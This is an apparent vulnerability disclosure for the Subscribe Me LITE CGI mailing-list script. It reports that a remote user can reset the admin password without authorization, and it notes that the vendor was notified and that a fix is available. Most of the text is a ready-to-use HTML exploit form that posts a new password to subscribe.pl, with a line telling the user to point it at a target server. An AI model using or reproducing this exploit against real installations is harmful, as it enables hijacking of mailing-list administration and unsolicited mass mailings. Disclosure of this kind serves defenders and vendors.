Product: Subscribe Me
Versions: All version number, LITE only
Vendor: Notified, http://www.cgiscriptcenter.com/


FIXES AVAILABLE: Account Manager LITE  at  http://www.cgiscriptcenter.com/acctlite/


The Problem:

    Once again a remote user can alter the Admin Password for the Subscribe Me Admin Control Panel. Allowing a user to add and remove ppl from the list as well as initiate a mailling with a message body of their choice.
  
Exploit:
See the html attachment included.



-------------here---------------
<html>
<FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
    <CENTER><BR>
    <TABLE BORDER="0" WIDTH="400">
      <TBODY>
      <TR>
        <TD>
        
        <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
          Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
        <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></CENTER>
        <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
        <CENTER>
        <TABLE BORDER="0">
          <TBODY>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
            <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
          </TR>
          <TR>
            <TD ALIGN="CENTER"><BR>
            <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
            <TD><BR>
            <INPUT TYPE="RESET" NAME=""></TD>
          </TR></TBODY>
        </TABLE></CENTER></TD>
      </TR></TBODY>
    </TABLE>
<FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
</html>